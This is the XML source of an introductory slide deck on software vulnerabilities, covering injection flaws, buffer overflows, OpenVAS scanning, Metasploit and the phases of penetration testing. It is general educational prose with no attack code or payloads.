                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Unrestricted upload of dangerous files types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Reliance on untrusted inputs in a security decision</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Download of codes without integrity checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>URL redirection to untrusted sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Weak passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Software that is already infected with virus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A64415-E70A-B24A-1AB7-26ACECD7F3E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>OS command injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{6FFB8B93-45A1-ED61-E3F7-CBBF828C59EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell (command line interface).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32412788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0995EB-A58B-DFDF-30DB-E9084F5146D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>HTML injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{6E41E6BB-C8C6-CE8F-185B-40864363C527}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>It is a type of injection issue that occurs when a user is able to control an input point and is able to inject arbitrary HTML code into a vulnerable web page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>This vulnerability can have many consequences, like disclosure of a user's session cookies that could be used to mimic the victim, or, more generally, it can allow the attacker to modify the page content seen by the victims.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>This injection allows the attacker to send a malicious HTML page to a victim. The targeted browser will not be able to distinguish the trusted part from the malicious parts and consequently will execute all like a trusted part in the victim system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1232222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094577-8D33-07AC-6BCD-E8577EB62DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{6F7D9EE9-A540-D100-63C3-EC26B9F29708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>SQL injection is a code injection technique that might destroy your database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>SQL injection is the placement of malicious code in SQL statements, via web page input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>SQL injection usually occurs when you ask a user for input, like their username/user id, and instead of a name/id, the user gives you an SQL statement that you will unknowingly run on your database.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2113212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6751A-615A-8E45-4767-32A205D016B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D28BE41B-BD02-41D5-0F0A-3843C9C7A903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>A buffer overflow occurs when a program attempts to write more data to a fixed length block of memory, or buffer, than the buffer is allocated to hold.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Since buffers are created to contain a defined amount of data, the extra data can overwrite data values in memory addresses adjacent to the destination buffer unless the program includes sufficient bounds checking to flag or discard data when too much is sent to a memory buffer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Exploiting a buffer overflow allows an attacker to control or crash the process or to modify its internal variables. Buffer overflow always ranks high in the Common Weakness Enumeration (CWE).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22919897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 name="Content Placeholder 132"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2498019" y="2120900"/>
            <a:ext cx="7202311" cy="405130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5856FB-0B26-4FA9-2629-F4315335A996}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3E4DE311-FB8F-ED22-011A-9A0FF7F72E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities are weaknesses or flaws present in a software or </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>hardware of a system</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4776396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OPENVAS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Open Vulnerability Assessment System (OpenVAS) originally </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   known as GNessUs is a software framework of several services and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   tools offering vulnerability scanning and vulnerability </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   management.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Architecture of OpenVAS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  The Open Vulnerability Assessment System (OpenVAS) collects and manages security information for networks, devices, and  systems.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descr="Architecture-of-OpenVAS"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2489526" y="2120900"/>
            <a:ext cx="7219297" cy="40513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Services Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OpenVAS Scanner: OpenVAS scanner is at the center of the architecture which executes the Network Vulnerability Tests  (NVTs). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The NVTs are updated regularly with the NVT feeds. OpenVAS Manager: It is the heart of OpenVAS architecture. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The manager receives different task from the OpenVAS Administrator.</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ym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Data Components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   NVT’s: It is the database where all type of known vulnerabilities are getting updated. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Currently it keeps a database of around   50,000 vulnerabilities.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Benefits of OpenVAS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   1. It is Open Source.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   2. Compatible with different Operating System.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   3. It Keeps a history of past scans.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   4. Free for unlimited IPs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   5. It has Good community support.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   6. Can produce audit reports.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Limitations of OpenVAS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   1. False negatives may be reported.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   2. It finds less vulnerabilities as compared to Nessus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   3. OpenVAS is very complex to install and configure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METASPLOIT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It is a penetration testing software developed in Ruby script. It is </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   developed by H D Moore in 2003.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> It is an open source software development kit with the world's </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    largest, public collection of quality-assured exploits.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Functioning of Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Metasploit open source tool is used for</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  1. Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  2. IDS Signature Development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  3. Exploit Research</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Penetration Testing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration testing (also known as pen test or pen testing) is the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   practice of finding the vulnerabilities present in a computer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   system, network or a web application. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Planning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reconnaissance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability Assessment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Reporting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerabilities are weaknesses or flaws present in a software or hardware of a system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Vulnerability Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Vulnerability  scanning  is  a  security  technique  used  to  identify security weaknesses in a computer system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Vulnerability  scanning  can  be  used  by  individuals  or  network administrators for security purposes, or it can be used by hackers attempting to gain unauthorized accessto computer systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>The result of a vulnerability scan is a list of all the systems found and  identified  on  the  network,  highlighting  any  that  have  known vulnerabilities that may need attention.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IDS Signature Development</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>IDS Signature means recorded evidence of a system intrusion,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   typically as part of an intrusion detection system (IDS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>When a malicious attack is launched against a system, the attack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   typically leaves evidence of the intrusion in the systems logs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Each intrusion leaves a kind of footprint behind (e.g., </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   unauthorized software executions, failed logins, misuse of </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   administrative privileges, file and directory access) that </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   administrators can document and use to prevent the same attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   in the future.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Exploit Research</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solidFill>
